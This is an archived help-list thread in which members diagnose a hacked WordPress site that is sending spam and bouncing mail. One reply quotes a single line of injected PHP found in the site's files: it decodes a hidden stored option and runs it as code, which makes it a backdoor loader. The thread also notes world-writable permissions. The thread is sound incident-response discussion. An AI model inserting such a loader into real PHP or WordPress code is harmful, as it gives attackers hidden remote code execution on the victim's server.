[HCoop-Help] wordpress spam, failed mail delivery notices.
Jesse Shumway
layline at hcoop.net
Fri May 17 23:09:26 EDT 2013
On May 17, 2013, at 10:39 PM, Clinton Ebadi <clinton at unknownlamer.org> wrote:
> Yagnesh Raghava Yakkala <yagnesh at hcoop.net> writes:
>
>> Hello all,
>>
>> My inbox is getting filled with mail delivery failure notices today (similar
>> to the attached mail). It looks like it has something to do with akismet spam
>> filter on my wordpress site (sapporoindians.com). I don't understand the
>> problem.
>>
>> Any insights would great on:
>> - how to know which program is initiating mail delivery
>> - how to stop receiving failure notices to my inbox
>>
>> FYI, I haven't touched anything on my site for a long while now.
>
> Ack, Jesse is right -- your site has most definitely been hacked!
>
> This code is in a few files:
>
> $z=get_option("_site_transient_browser_fd2cad7aa8fab7055192469be2dc6c7d"); $z=base64_decode(str_rot13($z)); if(strpos($z,"C260540C")!==false){ $_z=create_function("",$z); @$_z(); }
This looks a lot like the crack's signature as discussed in the wordpress forum entry I mentioned earlier:
http://wordpress.org/support/topic/site-hacked-through-akismet
> First, your wp-content directory is allowing ANYONE in the entire world
> to write to it via afs... did you accidentally grant system:anyuser
> write permissions when trying to do something else (I know the plugin
> installer does not work unless your daemon user can writer to
> wp-content)?
>
> Then there is the telltale chmod 777 (that does nothing, since we are
> using afs).
Again, other wordpress sites cracked with this exploit have had many permissions opened wide.
Yagnesh, in addition to Clinton's always excellent advice I bet you'd find some good repair suggestions from other wordpress users on the wordpress forums. Heck, sites have been falling from this exploit for almost a year now, so there may be a pinned entry or a faq.
Saporro huh? Way up north in Hokkaido. My brother spent a couple of years in Hokkaido. He said it was very cold, and this from someone who grew up and lives in the Rocky Mountains (Utah and Colorado).
Best Regards,
-- Jesse Shumway
More information about the HCoop-Help
mailing list